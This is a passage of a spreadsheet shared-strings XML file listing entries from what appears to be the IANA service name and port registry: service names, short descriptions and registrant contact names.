    <t>[Jacob_Ulmert]</t>
  </si>
  <si>
    <t>apollo-status</t>
  </si>
  <si>
    <t>APOLLO Status</t>
  </si>
  <si>
    <t>apollo-gms</t>
  </si>
  <si>
    <t>APOLLO GMS</t>
  </si>
  <si>
    <t>[Simon_Hovell]</t>
  </si>
  <si>
    <t>sabams</t>
  </si>
  <si>
    <t>Saba MS</t>
  </si>
  <si>
    <t>[Davoud_Maha]</t>
  </si>
  <si>
    <t>dicom-iscl</t>
  </si>
  <si>
    <t>DICOM ISCL</t>
  </si>
  <si>
    <t>dicom-tls</t>
  </si>
  <si>
    <t>DICOM TLS</t>
  </si>
  <si>
    <t>[Lawrence_Tarbox]</t>
  </si>
  <si>
    <t>desktop-dna</t>
  </si>
  <si>
    <t>Desktop DNA</t>
  </si>
  <si>
    <t>[Jon_Walker]</t>
  </si>
  <si>
    <t>data-insurance</t>
  </si>
  <si>
    <t>Data Insurance</t>
  </si>
  <si>
    <t>[Brent_Irwin]</t>
  </si>
  <si>
    <t>qip-audup</t>
  </si>
  <si>
    <t>compaq-scp</t>
  </si>
  <si>
    <t>Compaq SCP</t>
  </si>
  <si>
    <t>uadtc</t>
  </si>
  <si>
    <t>UADTC</t>
  </si>
  <si>
    <t>uacs</t>
  </si>
  <si>
    <t>UACS</t>
  </si>
  <si>
    <t>[Vishwas_Lele]</t>
  </si>
  <si>
    <t>exce</t>
  </si>
  <si>
    <t>eXcE</t>
  </si>
  <si>
    <t>veronica</t>
  </si>
  <si>
    <t>Veronica</t>
  </si>
  <si>
    <t>[Jonas_Oberg]</t>
  </si>
  <si>
    <t>vergencecm</t>
  </si>
  <si>
    <t>Vergence CM</t>
  </si>
  <si>
    <t>auris</t>
  </si>
  <si>
    <t>[Francisco_Saez_Aranc]</t>
  </si>
  <si>
    <t>rbakcup1</t>
  </si>
  <si>
    <t>RBackup Remote Backup</t>
  </si>
  <si>
    <t>rbakcup2</t>
  </si>
  <si>
    <t>[Rob_Cosgrove]</t>
  </si>
  <si>
    <t>smpp</t>
  </si>
  <si>
    <t>SMPP</t>
  </si>
  <si>
    <t>[Owen_Sullivan]</t>
  </si>
  <si>
    <t>ridgeway1</t>
  </si>
  <si>
    <t>Ridgeway Systems &amp; Software</t>
  </si>
  <si>
    <t>ridgeway2</t>
  </si>
  <si>
    <t>[Steve_Read]</t>
  </si>
  <si>
    <t>gwen-sonya</t>
  </si>
  <si>
    <t>Gwen-Sonya</t>
  </si>
  <si>
    <t>[Mark_Hurst]</t>
  </si>
  <si>
    <t>lbc-sync</t>
  </si>
  <si>
    <t>LBC Sync</t>
  </si>
  <si>
    <t>lbc-control</t>
  </si>
  <si>
    <t>LBC Control</t>
  </si>
  <si>
    <t>[Keiji_Michine]</t>
  </si>
  <si>
    <t>whosells</t>
  </si>
  <si>
    <t>everydayrc</t>
  </si>
  <si>
    <t>aises</t>
  </si>
  <si>
    <t>AISES</t>
  </si>
  <si>
    <t>[Daniel_Grazioli]</t>
  </si>
  <si>
    <t>www-dev</t>
  </si>
  <si>
    <t>world wide web - development</t>
  </si>
  <si>
    <t>aic-np</t>
  </si>
  <si>
    <t>[Brad_Parker]</t>
  </si>
  <si>
    <t>aic-oncrpc</t>
  </si>
  <si>
    <t>aic-oncrpc - Destiny MCD database</t>
  </si>
  <si>
    <t>piccolo</t>
  </si>
  <si>
    <t>piccolo - Cornerstone Software</t>
  </si>
  <si>
    <t>[Dave_Bellivea]</t>
  </si>
  <si>
    <t>fryeserv</t>
  </si>
  <si>
    <t>NetWare Loadable Module - Seagate Software</t>
  </si>
  <si>
    <t>[Joseph_LoPilato]</t>
  </si>
  <si>
    <t>media-agent</t>
  </si>
  <si>
    <t>Media Agent</t>
  </si>
  <si>
    <t>[Nitzan_Daube]</t>
  </si>
  <si>
    <t>plgproxy</t>
  </si>
  <si>
    <t>PLG Proxy</t>
  </si>
  <si>
    <t>[Charlie_Hava]</t>
  </si>
  <si>
    <t>mtport-regist</t>
  </si>
  <si>
    <t>MT Port Registrator</t>
  </si>
  <si>
    <t>[Maxim_Tseitlin]</t>
  </si>
  <si>
    <t>f5-globalsite</t>
  </si>
  <si>
    <t>[Christian_Saether_2]</t>
  </si>
  <si>
    <t>initlsmsad</t>
  </si>
  <si>
    <t>[Kelly_Green]</t>
  </si>
  <si>
    <t>livestats</t>
  </si>
  <si>
    <t>LiveStats</t>
  </si>
  <si>
    <t>[Chris_Greene]</t>
  </si>
  <si>
    <t>ac-tech</t>
  </si>
  <si>
    <t>[Chiming_Huang]</t>
  </si>
  <si>
    <t>esp-encap</t>
  </si>
  <si>
    <t>[Jorn_Sierwald]</t>
  </si>
  <si>
    <t>tmesis-upshot</t>
  </si>
  <si>
    <t>TMESIS-UPShot</t>
  </si>
  <si>
    <t>[Brian_Schenkenberger]</t>
  </si>
  <si>
    <t>icon-discover</t>
  </si>
  <si>
    <t>ICON Discover</t>
  </si>
  <si>
    <t>[Alexander_Falk]</t>
  </si>
  <si>
    <t>acc-raid</t>
  </si>
  <si>
    <t>ACC RAID</t>
  </si>
  <si>
    <t>igcp</t>
  </si>
  <si>
    <t>IGCP</t>
  </si>
  <si>
    <t>[David_Hampson]</t>
  </si>
  <si>
    <t>veritas-tcp1</t>
  </si>
  <si>
    <t>Veritas TCP1</t>
  </si>
  <si>
    <t>veritas-udp1</t>
  </si>
  <si>
    <t>Veritas UDP1</t>
  </si>
  <si>
    <t>[Russ_Thrasher]</t>
  </si>
  <si>
    <t>btprjctrl</t>
  </si>
  <si>
    <t>[Huw_Thomas]</t>
  </si>
  <si>
    <t>dvr-esm</t>
  </si>
  <si>
    <t>March Networks Digital Video Recorders and Enterprise Service Manager products</t>
  </si>
  <si>
    <t>[Paul_Streatch]</t>
  </si>
  <si>
    <t>wta-wsp-s</t>
  </si>
  <si>
    <t>WTA WSP-S</t>
  </si>
  <si>
    <t>[Sebastien_Bury]</t>
  </si>
  <si>
    <t>cspuni</t>
  </si>
  <si>
    <t>cspmulti</t>
  </si>
  <si>
    <t>[Terumasa_Yoneda]</t>
  </si>
  <si>
    <t>j-lan-p</t>
  </si>
  <si>
    <t>J-LAN-P</t>
  </si>
  <si>
    <t>[Takeshi_Sahara]</t>
  </si>
  <si>
    <t>corbaloc</t>
  </si>
  <si>
    <t>CORBA LOC</t>
  </si>
  <si>
    <t>[Ted_McFadden]</t>
  </si>
  <si>
    <t>netsteward</t>
  </si>
  <si>
    <t>Active Net Steward</t>
  </si>
  <si>
    <t>[Keith_Morley]</t>
  </si>
  <si>
    <t>gsiftp</t>
  </si>
  <si>
    <t>GSI FTP</t>
  </si>
  <si>
    <t>[Von_Welch]</t>
  </si>
  <si>
    <t>atmtcp</t>
  </si>
  <si>
    <t>llm-pass</t>
  </si>
  <si>
    <t>llm-csv</t>
  </si>
  <si>
    <t>[Glen_Sansoucie_2]</t>
  </si>
  <si>
    <t>lbc-measure</t>
  </si>
  <si>
    <t>LBC Measurement</t>
  </si>
  <si>
    <t>lbc-watchdog</t>
  </si>
  <si>
    <t>LBC Watchdog</t>
  </si>
  <si>
    <t>nmsigport</t>
  </si>
  <si>
    <t>NMSig Port</t>
  </si>
  <si>
    <t>[Peter_Egli_2]</t>
  </si>
  <si>
    <t>rmlnk</t>
  </si>
  <si>
    <t>fc-faultnotify</t>
  </si>
  <si>
    <t>FC Fault Notification</t>
  </si>
  <si>
    <t>[Dave_Watkins]</t>
  </si>
  <si>
    <t>univision</t>
  </si>
  <si>
    <t>UniVision</t>
  </si>
  <si>
    <t>[Keith_Ansell]</t>
  </si>
  <si>
    <t>vrts-at-port</t>
  </si>
  <si>
    <t>VERITAS Authentication Service</t>
  </si>
  <si>
    <t>ka0wuc</t>
  </si>
  <si>
    <t>[Kit_Haskins]</t>
  </si>
  <si>
    <t>cqg-netlan</t>
  </si>
  <si>
    <t>CQG Net/LAN</t>
  </si>
  <si>
    <t>cqg-netlan-1</t>
  </si>
  <si>
    <t>CQG Net/LAN 1</t>
  </si>
  <si>
    <t>[Jeff_Wood]</t>
  </si>
  <si>
    <t>CQG Net/Lan 1</t>
  </si>
  <si>
    <t>(unassigned) Possibly assigned</t>
  </si>
  <si>
    <t>slc-systemlog</t>
  </si>
  <si>
    <t>slc systemlog</t>
  </si>
  <si>
    <t>slc-ctrlrloops</t>
  </si>
  <si>
    <t>slc ctrlrloops</t>
  </si>
  <si>
    <t>[Erwin_Hogeweg]</t>
  </si>
  <si>
    <t>itm-lm</t>
  </si>
  <si>
    <t>ITM License Manager</t>
  </si>
  <si>
    <t>silkp1</t>
  </si>
  <si>
    <t>silkp2</t>
  </si>
  <si>
    <t>silkp3</t>
  </si>
  <si>
    <t>silkp4</t>
  </si>
  <si>
    <t>[Erik_Skyten]</t>
  </si>
  <si>
    <t>glishd</t>
  </si>
  <si>
    <t>[Darrell_Schiebel]</t>
  </si>
  <si>
    <t>evtp</t>
  </si>
  <si>
    <t>EVTP</t>
  </si>
  <si>
    <t>evtp-data</t>
  </si>
  <si>
    <t>EVTP-DATA</t>
  </si>
  <si>
    <t>catalyst</t>
  </si>
  <si>
    <t>[Garret_Tollkuhn]</t>
  </si>
  <si>
    <t>repliweb</t>
  </si>
  <si>
    <t>Repliweb</t>
  </si>
  <si>
    <t>[William_Orme]</t>
  </si>
  <si>
    <t>starbot</t>
  </si>
  <si>
    <t>Starbot</t>
  </si>
  <si>
    <t>[Markus_Sabadello_2]</t>
  </si>
  <si>
    <t>NMSigPort</t>
  </si>
  <si>
    <t>l3-exprt</t>
  </si>
  <si>
    <t>l3-ranger</t>
  </si>
  <si>
    <t>l3-hawk</t>
  </si>
  <si>
    <t>[Dolores_Scott_2]</t>
  </si>
  <si>
    <t>pdnet</t>
  </si>
  <si>
    <t>PDnet</t>
  </si>
  <si>
    <t>[Torsten_Scheffler]</t>
  </si>
  <si>
    <t>bpcp-poll</t>
  </si>
  <si>
    <t>BPCP POLL</t>
  </si>
  <si>
    <t>bpcp-trap</t>
  </si>
  <si>
    <t>BPCP TRAP</t>
  </si>
  <si>
    <t>[Steve_Van_Duser]</t>
  </si>
  <si>
    <t>aimpp-hello</t>
  </si>
  <si>
    <t>AIMPP Hello</t>
  </si>
  <si>
    <t>aimpp-port-req</t>
  </si>
  <si>
    <t>AIMPP Port Req</t>
  </si>
  <si>
    <t>[Brian_Martinicky]</t>
  </si>
  <si>
    <t>amt-blc-port</t>
  </si>
  <si>
    <t>AMT-BLC-PORT</t>
  </si>
  <si>
    <t>[Sandra_Frulloni]</t>
  </si>
  <si>
    <t>FXP</t>
  </si>
  <si>
    <t>[Martin_Lichtin]</t>
  </si>
  <si>
    <t>metaconsole</t>
  </si>
  <si>
    <t>MetaConsole</t>
  </si>
  <si>
    <t>[Rakesh_Mahajan]</t>
  </si>
  <si>
    <t>webemshttp</t>
  </si>
  <si>
    <t>bears-01</t>
  </si>
  <si>
    <t>[Bruce_McKinnon]</t>
  </si>
  <si>
    <t>ispipes</t>
  </si>
  <si>
    <t>ISPipes</t>
  </si>
  <si>
    <t>[Rajesh_Nandyalam]</t>
  </si>
  <si>
    <t>infomover</t>
  </si>
  <si>
    <t>InfoMover</t>
  </si>
  <si>
    <t>[Carla_Caputo]</t>
  </si>
  <si>
    <t>msrp</t>
  </si>
  <si>
    <t>MSRP over TCP</t>
  </si>
  <si>
    <t>[RFC4976]</t>
  </si>
  <si>
    <t>cesdinv</t>
  </si>
  <si>
    <t>[Yoshiaki_Tokumoto]</t>
  </si>
  <si>
    <t>simctlp</t>
  </si>
  <si>
    <t>SimCtIP</t>
  </si>
  <si>
    <t>[Christian_Zietz]</t>
  </si>
  <si>
    <t>ecnp</t>
  </si>
  <si>
    <t>ECNP</t>
  </si>
  <si>
    <t>activememory</t>
  </si>
  <si>
    <t>Active Memory</t>
  </si>
  <si>
    <t>[Joe_Graham]</t>
  </si>
  <si>
    <t>dialpad-voice1</t>
  </si>
  <si>
    <t>Dialpad Voice 1</t>
  </si>
  <si>
    <t>dialpad-voice2</t>
  </si>
  <si>
    <t>Dialpad Voice 2</t>
  </si>
  <si>
    <t>[Wongyu_Cho]</t>
  </si>
  <si>
    <t>ttg-protocol</t>
  </si>
  <si>
    <t>TTG Protocol</t>
  </si>
  <si>
    <t>[Mark_Boler]</t>
  </si>
  <si>
    <t>sonardata</t>
  </si>
  <si>
    <t>Sonar Data</t>
  </si>
  <si>
    <t>[Ian_Higginbottom]</t>
  </si>
  <si>
    <t>astronova-main</t>
  </si>
  <si>
    <t>main 5001 cmd</t>
  </si>
  <si>
    <t>[AstroNova_Inc]</t>
  </si>
  <si>
    <t>[Chris_Tate]</t>
  </si>
  <si>
    <t>pit-vpn</t>
  </si>
  <si>
    <t>[Norbert_Sendetzky]</t>
  </si>
  <si>
    <t>iwlistener</t>
  </si>
  <si>
    <t>esps-portal</t>
  </si>
  <si>
    <t>[Nicholas_Stowfis]</t>
  </si>
  <si>
    <t>npep-messaging</t>
  </si>
  <si>
    <t>Norman Proprietaqry Events Protocol</t>
  </si>
  <si>
    <t>[AVG_Technologies_Norway_AS]</t>
  </si>
  <si>
    <t>[Kristian_A_Bognaes_2]</t>
  </si>
  <si>
    <t>icslap</t>
  </si>
  <si>
    <t>ICSLAP</t>
  </si>
  <si>
    <t>[Richard_Lamb]</t>
  </si>
  <si>
    <t>daishi</t>
  </si>
  <si>
    <t>[Patrick_Chipman]</t>
  </si>
  <si>
    <t>msi-selectplay</t>
  </si>
  <si>
    <t>MSI Select Play</t>
  </si>
  <si>
    <t>[Paul_Fonte]</t>
  </si>
  <si>
    <t>radix</t>
  </si>
  <si>
    <t>RADIX</t>
  </si>
  <si>
    <t>[Stein_Roger_Skaflott]</t>
  </si>
  <si>
    <t>dxmessagebase1</t>
  </si>
  <si>
    <t>DX Message Base Transport Protocol</t>
  </si>
  <si>
    <t>dxmessagebase2</t>
  </si>
  <si>
    <t>[G_E_Ozz_Nixon_Jr]</t>
  </si>
  <si>
    <t>sps-tunnel</t>
  </si>
  <si>
    <t>SPS Tunnel</t>
  </si>
  <si>
    <t>[Bill_McIntosh]</t>
  </si>
  <si>
    <t>bluelance</t>
  </si>
  <si>
    <t>BLUELANCE</t>
  </si>
  <si>
    <t>[Michael_Padrezas]</t>
  </si>
  <si>
    <t>aap</t>
  </si>
  <si>
    <t>AAP</t>
  </si>
  <si>
    <t>ucentric-ds</t>
  </si>
  <si>
    <t>[Alex_Vasilevsky]</t>
  </si>
  <si>
    <t>synapse</t>
  </si>
  <si>
    <t>Synapse Transport</t>
  </si>
  <si>
    <t>[Ali_Fracyon]</t>
  </si>
  <si>
    <t>ndsp</t>
  </si>
  <si>
    <t>NDSP</t>
  </si>
  <si>
    <t>ndtp</t>
  </si>
  <si>
    <t>NDTP</t>
  </si>
  <si>
    <t>ndnp</t>
  </si>
  <si>
    <t>NDNP</t>
  </si>
  <si>
    <t>[Khelben_Blackstaff]</t>
  </si>
  <si>
    <t>flashmsg</t>
  </si>
  <si>
    <t>Flash Msg</t>
  </si>
  <si>
    <t>[Jeffrey_Zinkerman]</t>
  </si>
  <si>
    <t>topflow</t>
  </si>
  <si>
    <t>TopFlow</t>
  </si>
  <si>
    <t>responselogic</t>
  </si>
  <si>
    <t>RESPONSELOGIC</t>
  </si>
  <si>
    <t>[Bruce_Casey]</t>
  </si>
  <si>
    <t>aironetddp</t>
  </si>
  <si>
    <t>aironet</t>
  </si>
  <si>
    <t>[Victor_Griswold]</t>
  </si>
  <si>
    <t>spcsdlobby</t>
  </si>
  <si>
    <t>SPCSDLOBBY</t>
  </si>
  <si>
    <t>[Matthew_Williams]</t>
  </si>
  <si>
    <t>rsom</t>
  </si>
  <si>
    <t>RSOM</t>
  </si>
  <si>
    <t>[Justine_Higgins]</t>
  </si>
  <si>
    <t>cspclmulti</t>
  </si>
  <si>
    <t>CSPCLMULTI</t>
  </si>
  <si>
    <t>[Yoneda_Terumasa]</t>
  </si>
  <si>
    <t>cinegrfx-elmd</t>
  </si>
  <si>
    <t>CINEGRFX-ELMD License Manager</t>
  </si>
  <si>
    <t>[Greg_Ercolano_2]</t>
  </si>
  <si>
    <t>snifferdata</t>
  </si>
  <si>
    <t>SNIFFERDATA</t>
  </si>
  <si>
    <t>[Jeff_Mangasarian]</t>
  </si>
  <si>
    <t>vseconnector</t>
  </si>
  <si>
    <t>VSECONNECTOR</t>
  </si>
  <si>
    <t>abacus-remote</t>
  </si>
  <si>
    <t>ABACUS-REMOTE</t>
  </si>
  <si>
    <t>[Mike_Bello]</t>
  </si>
  <si>
    <t>natuslink</t>
  </si>
  <si>
    <t>NATUS LINK</t>
  </si>
  <si>
    <t>[Jonathan_Mergy]</t>
  </si>
  <si>
    <t>ecovisiong6-1</t>
  </si>
  <si>
    <t>ECOVISIONG6-1</t>
  </si>
  <si>
    <t>[Henrik_Holst]</t>
  </si>
  <si>
    <t>citrix-rtmp</t>
  </si>
  <si>
    <t>Citrix RTMP</t>
  </si>
  <si>
    <t>appliance-cfg</t>
  </si>
  <si>
    <t>APPLIANCE-CFG</t>
  </si>
  <si>
    <t>[Gary_A_James]</t>
  </si>
  <si>
    <t>powergemplus</t>
  </si>
  <si>
    <t>POWERGEMPLUS</t>
  </si>
  <si>
    <t>[Koich_Nakamura]</t>
  </si>
  <si>
    <t>quicksuite</t>
  </si>
  <si>
    <t>QUICKSUITE</t>
  </si>
  <si>
    <t>[William_Egge]</t>
  </si>
  <si>
    <t>allstorcns</t>
  </si>
  <si>
    <t>ALLSTORCNS</t>
  </si>
  <si>
    <t>[Steve_Dobson]</t>
  </si>
  <si>
    <t>netaspi</t>
  </si>
  <si>
    <t>NET ASPI</t>
  </si>
  <si>
    <t>[Johnson_Luo]</t>
  </si>
  <si>
    <t>suitcase</t>
  </si>
  <si>
    <t>SUITCASE</t>
  </si>
  <si>
    <t>[Milton_E_Sagen]</t>
  </si>
  <si>
    <t>m2ua</t>
  </si>
  <si>
    <t>M2UA</t>
  </si>
  <si>
    <t>[Lyndon_Ong]</t>
  </si>
  <si>
    <t>m3ua</t>
  </si>
  <si>
    <t>M3UA</t>
  </si>
  <si>
    <t>[RFC4666]</t>
  </si>
  <si>
    <t>caller9</t>
  </si>
  <si>
    <t>CALLER9</t>
  </si>
  <si>
    <t>[Shams_Naqi]</t>
  </si>
  <si>
    <t>webmethods-b2b</t>
  </si>
  <si>
    <t>WEBMETHODS B2B</t>
  </si>
  <si>
    <t>[Joseph_Hines]</t>
  </si>
  <si>
    <t>mao</t>
  </si>
  <si>
    <t>[Marc_Baudoin]</t>
  </si>
  <si>
    <t>funk-dialout</t>
  </si>
  <si>
    <t>Funk Dialout</t>
  </si>
  <si>
    <t>[Cimarron_Boozer]</t>
  </si>
  <si>
    <t>tdaccess</t>
  </si>
  <si>
    <t>TDAccess</t>
  </si>
  <si>
    <t>blockade</t>
  </si>
  <si>
    <t>Blockade</t>
  </si>
  <si>
    <t>epicon</t>
  </si>
  <si>
    <t>Epicon</t>
  </si>
  <si>
    <t>[Michael_Khalandovsky]</t>
  </si>
  <si>
    <t>boosterware</t>
  </si>
  <si>
    <t>Booster Ware</t>
  </si>
  <si>
    <t>[Ido_Ben_David]</t>
  </si>
  <si>
    <t>gamelobby</t>
  </si>
  <si>
    <t>Game Lobby</t>
  </si>
  <si>
    <t>[Paul_Ford_Hutchinson]</t>
  </si>
  <si>
    <t>tksocket</t>
  </si>
  <si>
    <t>TK Socket</t>
  </si>
  <si>
    <t>[Dino_Ciano]</t>
  </si>
  <si>
    <t>elvin-server</t>
  </si>
  <si>
    <t>Elvin Server
IANA assigned this well-formed service name as a replacement for "elvin_server".</t>
  </si>
  <si>
    <t>elvin_server</t>
  </si>
  <si>
    <t>Elvin Server</t>
  </si>
  <si>
    <t>This entry is an alias to "elvin-server".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>elvin-client</t>
  </si>
  <si>
    <t>Elvin Client
IANA assigned this well-formed service name as a replacement for "elvin_client".</t>
  </si>
  <si>
    <t>[David_Arnold]</t>
  </si>
  <si>
    <t>elvin_client</t>
  </si>
  <si>
    <t>Elvin Client</t>
  </si>
  <si>
    <t>This entry is an alias to "elvin-client".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>kastenchasepad</t>
  </si>
  <si>
    <t>Kasten Chase Pad</t>
  </si>
  <si>
    <t>[Marc_Gauthier]</t>
  </si>
  <si>
    <t>roboer</t>
  </si>
  <si>
    <t>roboER</t>
  </si>
  <si>
    <t>[Paul_Snook]</t>
  </si>
  <si>
    <t>roboeda</t>
  </si>
  <si>
    <t>roboEDA</t>
  </si>
  <si>
    <t>cesdcdman</t>
  </si>
  <si>
    <t>CESD Contents Delivery Management</t>
  </si>
  <si>
    <t>cesdcdtrn</t>
  </si>
  <si>
    <t>CESD Contents Delivery Data Transfer</t>
  </si>
  <si>
    <t>wta-wsp-wtp-s</t>
  </si>
  <si>
    <t>WTA-WSP-WTP-S</t>
  </si>
  <si>
    <t>precise-vip</t>
  </si>
  <si>
    <t>PRECISE-VIP</t>
  </si>
  <si>
    <t>Unassigned (FRP-Released 12/7/00)</t>
  </si>
  <si>
    <t>mobile-file-dl</t>
  </si>
  <si>
    <t>MOBILE-FILE-DL</t>
  </si>
  <si>
    <t>[Mitsuji_Toda]</t>
  </si>
  <si>
    <t>unimobilectrl</t>
  </si>
  <si>
    <t>UNIMOBILECTRL</t>
  </si>
  <si>
    <t>[Vikas]</t>
  </si>
  <si>
    <t>redstone-cpss</t>
  </si>
  <si>
    <t>REDSTONE-CPSS</t>
  </si>
  <si>
    <t>[Jeff_Looman]</t>
  </si>
  <si>
    <t>amx-webadmin</t>
  </si>
  <si>
    <t>AMX-WEBADMIN</t>
  </si>
  <si>
    <t>[Mike_Morris]</t>
  </si>
  <si>
    <t>amx-weblinx</t>
  </si>
  <si>
    <t>AMX-WEBLINX</t>
  </si>
  <si>
    <t>circle-x</t>
  </si>
  <si>
    <t>Circle-X</t>
  </si>
  <si>
    <t>[Norm_Freedman_2]</t>
  </si>
  <si>
    <t>incp</t>
  </si>
  <si>
    <t>INCP</t>
  </si>
  <si>
    <t>[Keith_Paulsen]</t>
  </si>
  <si>
    <t>4-tieropmgw</t>
  </si>
  <si>
    <t>4-TIER OPM GW</t>
  </si>
  <si>
    <t>[Francois_Peloffy]</t>
  </si>
  <si>
    <t>4-tieropmcli</t>
  </si>
  <si>
    <t>4-TIER OPM CLI</t>
  </si>
  <si>
    <t>qtp</t>
  </si>
  <si>
    <t>QTP</t>
  </si>
  <si>
    <t>[Cameron_Young]</t>
  </si>
  <si>
    <t>otpatch</t>
  </si>
  <si>
    <t>OTPatch</t>
  </si>
  <si>
    <t>pnaconsult-lm</t>
  </si>
  <si>
    <t>PNACONSULT-LM</t>
  </si>
  <si>
    <t>[Theo_Nijssen]</t>
  </si>
  <si>
    <t>sm-pas-1</t>
  </si>
  <si>
    <t>SM-PAS-1</t>
  </si>
  <si>
    <t>sm-pas-2</t>
  </si>
  <si>
    <t>SM-PAS-2</t>
  </si>
  <si>
    <t>sm-pas-3</t>
  </si>
  <si>
    <t>SM-PAS-3</t>
  </si>
  <si>
    <t>sm-pas-4</t>
  </si>
  <si>
    <t>SM-PAS-4</t>
  </si>
  <si>
    <t>sm-pas-5</t>
  </si>
  <si>
    <t>SM-PAS-5</t>
  </si>
  <si>
    <t>ttnrepository</t>
  </si>
  <si>
    <t>TTNRepository</t>
  </si>
  <si>
    <t>[Robert_Orr]</t>
  </si>
  <si>
    <t>megaco-h248</t>
  </si>
  <si>
    <t>Megaco H-248</t>
  </si>
  <si>
    <t>[Tom_Taylor_2]</t>
  </si>
  <si>
    <t>Megaco-H.248 text</t>
  </si>
  <si>
    <t>[Tom_Taylor_3]</t>
  </si>
  <si>
    <t>h248-binary</t>
  </si>
  <si>
    <t>H248 Binary</t>
  </si>
  <si>
    <t>Megaco/H.248 binary</t>
  </si>
  <si>
    <t>fjsvmpor</t>
  </si>
  <si>
    <t>FJSVmpor</t>
  </si>
  <si>
    <t>[Naoki_Hayashi]</t>
  </si>
  <si>
    <t>gpsd</t>
  </si>
  <si>
    <t>GPS Daemon request/response protocol</t>
  </si>
  <si>
    <t>[Eric_S_Raymond]</t>
  </si>
  <si>
    <t>wap-push</t>
  </si>
  <si>
    <t>WAP PUSH</t>
  </si>
  <si>
    <t>wap-pushsecure</t>
  </si>
  <si>
    <t>WAP PUSH SECURE</t>
  </si>
  <si>
    <t>[WAP_Forum]</t>
  </si>
  <si>
    <t>esip</t>
  </si>
  <si>
    <t>ESIP</t>
  </si>
  <si>
    <t>[David_Stephenson]</t>
  </si>
  <si>
    <t>ottp</t>
  </si>
  <si>
    <t>OTTP</t>
  </si>
  <si>
    <t>[Brent_Foster]</t>
  </si>
  <si>
    <t>mpfwsas</t>
  </si>
  <si>
    <t>MPFWSAS</t>
  </si>
  <si>
    <t>[Toru_Murai]</t>
  </si>
  <si>
    <t>ovalarmsrv</t>
  </si>
  <si>
    <t>OVALARMSRV</t>
  </si>
  <si>
    <t>ovalarmsrv-cmd</t>
  </si>
  <si>
    <t>OVALARMSRV-CMD</t>
  </si>
  <si>
    <t>csnotify</t>
  </si>
  <si>
    <t>CSNOTIFY</t>
  </si>
  <si>
    <t>[Israel_Beniaminy]</t>
  </si>
  <si>
    <t>ovrimosdbman</t>
  </si>
  <si>
    <t>OVRIMOSDBMAN</t>
  </si>
  <si>
    <t>[Dimitrios_Souflis]</t>
  </si>
  <si>
    <t>jmact5</t>
  </si>
  <si>
    <t>JAMCT5</t>
  </si>
  <si>
    <t>jmact6</t>
  </si>
  <si>
    <t>JAMCT6</t>
  </si>
  <si>
    <t>rmopagt</t>
  </si>
  <si>
    <t>RMOPAGT</t>
  </si>
  <si>
    <t>[Shuji_Okubo]</t>
  </si>
  <si>
    <t>dfoxserver</t>
  </si>
  <si>
    <t>DFOXSERVER</t>
  </si>
  <si>
    <t>[David_Holden]</t>
  </si>
  <si>
    <t>boldsoft-lm</t>
  </si>
  <si>
    <t>BOLDSOFT-LM</t>
  </si>
  <si>
    <t>[Fredrik_Haglund]</t>
  </si>
  <si>
    <t>iph-policy-cli</t>
  </si>
  <si>
    <t>IPH-POLICY-CLI</t>
  </si>
  <si>
    <t>iph-policy-adm</t>
  </si>
  <si>
    <t>IPH-POLICY-ADM</t>
  </si>
  <si>
    <t>[Shai_Herzog]</t>
  </si>
  <si>
    <t>bullant-srap</t>
  </si>
  <si>
    <t>BULLANT SRAP</t>
  </si>
  <si>
    <t>bullant-rap</t>
  </si>
  <si>
    <t>BULLANT RAP</t>
  </si>
  <si>
    <t>[Michael_Cahill]</t>
  </si>
  <si>
    <t>idp-infotrieve</t>
  </si>
  <si>
    <t>IDP-INFOTRIEVE</t>
  </si>
  <si>
    <t>[Kevin_Bruckert]</t>
  </si>
  <si>
    <t>ssc-agent</t>
  </si>
  <si>
    <t>SSC-AGENT</t>
  </si>
  <si>
    <t>[George_Dzieciol]</t>
  </si>
  <si>
    <t>enpp</t>
  </si>
  <si>
    <t>ENPP</t>
  </si>
  <si>
    <t>[Kazuhito_Gassho]</t>
  </si>
  <si>
    <t>essp</t>
  </si>
  <si>
    <t>ESSP</t>
  </si>
  <si>
    <t>[Hitoshi_Ishida]</t>
  </si>
  <si>
    <t>index-net</t>
  </si>
  <si>
    <t>INDEX-NET</t>
  </si>
  <si>
    <t>[Chris_J_Wren]</t>
  </si>
  <si>
    <t>netclip</t>
  </si>
  <si>
    <t>NetClip clipboard daemon</t>
  </si>
  <si>
    <t>pmsm-webrctl</t>
  </si>
  <si>
    <t>PMSM Webrctl</t>
  </si>
  <si>
    <t>[Markus_Michels]</t>
  </si>
  <si>
    <t>svnetworks</t>
  </si>
  <si>
    <t>SV Networks</t>
  </si>
  <si>
    <t>[Sylvia_Siu_2]</t>
  </si>
  <si>
    <t>signal</t>
  </si>
  <si>
    <t>Signal</t>
  </si>
  <si>
    <t>[Wyatt_Williams]</t>
  </si>
  <si>
    <t>fjmpcm</t>
  </si>
  <si>
    <t>Fujitsu Configuration Management Service</t>
  </si>
  <si>
    <t>[Hiroki_Kawano]</t>
  </si>
  <si>
    <t>cns-srv-port</t>
  </si>
  <si>
    <t>CNS Server Port</t>
  </si>
  <si>
    <t>[Ram_Golla]</t>
  </si>
  <si>
    <t>ttc-etap-ns</t>
  </si>
  <si>
    <t>TTCs Enterprise Test Access Protocol - NS</t>
  </si>
  <si>
    <t>ttc-etap-ds</t>
  </si>
  <si>
    <t>TTCs Enterprise Test Access Protocol - DS</t>
  </si>
  <si>
    <t>[Daniel_Becker_2]</t>
  </si>
  <si>
    <t>h263-video</t>
  </si>
  <si>
    <t>H.263 Video Streaming</t>
  </si>
  <si>
    <t>[Jauvane_C_de_Olivei]</t>
  </si>
  <si>
    <t>wimd</t>
  </si>
  <si>
    <t>Instant Messaging Service</t>
  </si>
  <si>
    <t>[Kevin_Birch]</t>
  </si>
  <si>
    <t>mylxamport</t>
  </si>
  <si>
    <t>MYLXAMPORT</t>
  </si>
  <si>
    <t>[Wei_Gao]</t>
  </si>
  <si>
    <t>iwb-whiteboard</t>
  </si>
  <si>
    <t>IWB-WHITEBOARD</t>
  </si>
  <si>
    <t>[David_W_Radcliffe]</t>
  </si>
  <si>
    <t>netplan</t>
  </si>
  <si>
    <t>NETPLAN</t>
  </si>
  <si>
    <t>[Thomas_Driemeyer]</t>
  </si>
  <si>
    <t>hpidsadmin</t>
  </si>
  <si>
    <t>HPIDSADMIN</t>
  </si>
  <si>
    <t>hpidsagent</t>
  </si>
  <si>
    <t>HPIDSAGENT</t>
  </si>
  <si>
    <t>[John_Trudeau]</t>
  </si>
  <si>
    <t>stonefalls</t>
  </si>
  <si>
